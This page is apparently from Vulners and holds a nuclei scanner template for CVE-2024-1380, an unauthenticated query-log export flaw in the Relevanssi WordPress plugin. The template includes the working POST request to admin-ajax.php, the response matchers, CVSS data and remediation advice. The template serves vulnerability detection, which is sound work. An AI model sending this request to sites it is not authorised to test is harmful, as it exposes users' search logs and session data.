Lucene search
K

Relevanssi (A Better Search) <= 4.22.0 - Query Log Export

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Relevanssi plugin <= 4.22.0 has an unauthorized data export vulnerability, fixed in 4.22.1.

Related
Refs
Code
id: CVE-2024-1380

info:
  name: Relevanssi (A Better Search) <= 4.22.0 - Query Log Export
  author: FLX
  severity: medium
  description: |
    The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.
  impact: |
    Unauthenticated attackers can export query log data containing search terms and potentially sensitive user information.
  remediation: |
    Update Relevanssi plugin to version 4.22.1 or later.
  reference:
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-1380
    epss-score: 0.50192
    epss-percentile: 0.9877
    cpe: cpe:2.3:a:relevanssi:relevanssi:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: "/wp-content/plugins/relevanssi/"
    product: relevanssi
    vendor: relevanssi
  tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=&relevanssi_export=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")'
          - 'contains_all(body, "user_id", "session_id")'
        condition: and
# digest: 4a0a00473045022100bd104bd41639e08f2d80a75e067fb2e5e0dc824ec56489f023a58357b8cf2ef302207b569f899b6ea7b783161ba046f686ff764d4fd3f13ad294d3d18ba8e44ad144:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.15.3
EPSS0.50192
SSVC
25